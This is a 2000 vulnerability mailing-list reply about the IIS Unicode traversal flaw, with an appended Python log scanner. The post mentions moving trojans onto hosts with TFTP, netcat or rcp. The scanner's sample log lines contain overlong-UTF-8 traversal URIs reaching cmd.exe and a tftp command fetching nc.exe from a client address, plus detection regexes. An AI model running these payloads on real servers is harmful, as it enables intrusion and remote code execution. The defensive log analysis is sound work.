Vulnerability Development mailing list archives

Re: Summary of IIS 4.0/5.0 Unicode thread (end of thread?)


From: "Robert A. Seace" <ras () SLARTIBARTFAST MAGRATHEA COM>
Date: Fri, 27 Oct 2000 06:40:38 -0400

In the profound words of Ryan Yagatich:

Summary of IIS 4.0/5.0 Unicode thread (end of thread?)

[very good summary snipped...]

Also, you can set up a TFTP server on your box and tftp the
file/trojan in which you are attempting to run. (netcat anyone?) All you
have to do is set up the command string the same way.

        Another way to transfer files would be "rcp", if you find
it easier to set up "in.rshd" on your server...  (At least,
the NT machine I saw had an "rcp.exe" client installed in
"\winnt\system32\"...  Not sure how standard that is...)

Protection:
There are multiple ways of getting around this. First of all, your webroot
is the key. (So far) it has been shown that this code will only execute if
the /winnt directory is located in the same as the webroot directory...

        Is that true?  I thought the point behind the "msadc" variation
was that it removed that limitation...  Because, as far as I can see,
the location of the "msadc" directory is actually
"C:\Program Files\Common Files\system\msadc" (on at least this
test system I'm using)...  (Just do a "dir", without the "+c:\", and
it'll show you the directory name...)  So, even if the web root were
elsewhere, as long as "Program Files" was on the same drive as "winnt",
it should work...  (I'm just speculating, here...  Someone with
more definitive info should definitely speak up...)

--
||========================================================================||
||    Rob Seace    ||               URL              || ras () magrathea com ||
||  AKA: Agrajag   || http://www.magrathea.com/~ras/ || rob () wordstock com ||
||========================================================================||
"What do you mean, you've never been to Alpha Centauri? For heaven's sake,
 mankind, it's only four light-years away, you know." - THGTTG
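As an added, defender-side illustration that is not part of the thread: a small Python scanner over constructed IIS W3C-style log lines that decodes each request the lenient way the affected IIS versions did (accepting overlong two-byte UTF-8 forms), then flags overlong encodings, directory traversal, the command and transfer tools discussed above (cmd.exe, tftp, rcp), and requests aimed at the msadc directory. The log lines, field layout and tag names are assumptions made for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed log lines (not from the thread): date time client-ip method uri-stem uri-query status
SAMPLE_LOG = """\
2000-10-27 06:40:38 10.0.0.5 GET /index.htm - 200
2000-10-27 06:41:02 10.0.0.9 GET /scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir+c:\\ 200
2000-10-27 06:41:30 10.0.0.9 GET /msadc/..%c1%9c..%c1%9cwinnt/system32/cmd.exe /c+tftp+-i+10.0.0.9+GET+nc.exe 200
2000-10-27 06:42:00 10.0.0.7 GET /docs/..%2freadme.txt - 404
"""

def lenient_decode(raw: bytes):
    """Decode like the vulnerable IIS: accept 'overlong' 2-byte UTF-8 (%c0%af -> '/',
    %c1%9c -> '\\'). Returns (text, saw_overlong); overlong forms are invalid UTF-8."""
    out, i, overlong = [], 0, False
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            overlong, i = True, i + 2
        else:
            out.append(chr(b))          # every other byte taken as Latin-1
            i += 1
    return "".join(out), overlong

TRAVERSAL = re.compile(r"\.\.[\\/]")
TOOLING = re.compile(r"cmd\.exe|\btftp\b|\brcp\b", re.I)

def analyse_request(uri: str, query: str):
    """Return (decoded_uri, reason_tags) for one request; an empty list means clean."""
    decoded, overlong = lenient_decode(unquote_to_bytes(uri))
    checks = [("overlong-utf8", overlong),
              ("traversal", TRAVERSAL.search(decoded)),
              ("cmd-or-transfer-tool", TOOLING.search(decoded + " " + query)),
              ("msadc-path", decoded.lower().startswith("/msadc/"))]  # outside webroot
    return decoded, [tag for tag, hit in checks if hit]

def scan_log(text: str):
    """Return [(client_ip, decoded_uri, reasons)] for every suspicious line."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue
        decoded, reasons = analyse_request(fields[4], fields[5])
        if reasons:
            hits.append((fields[2], decoded, reasons))
    return hits
```

Run `scan_log(SAMPLE_LOG)` to see the three flagged requests; the msadc line is tagged even though its path never touches the web root.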
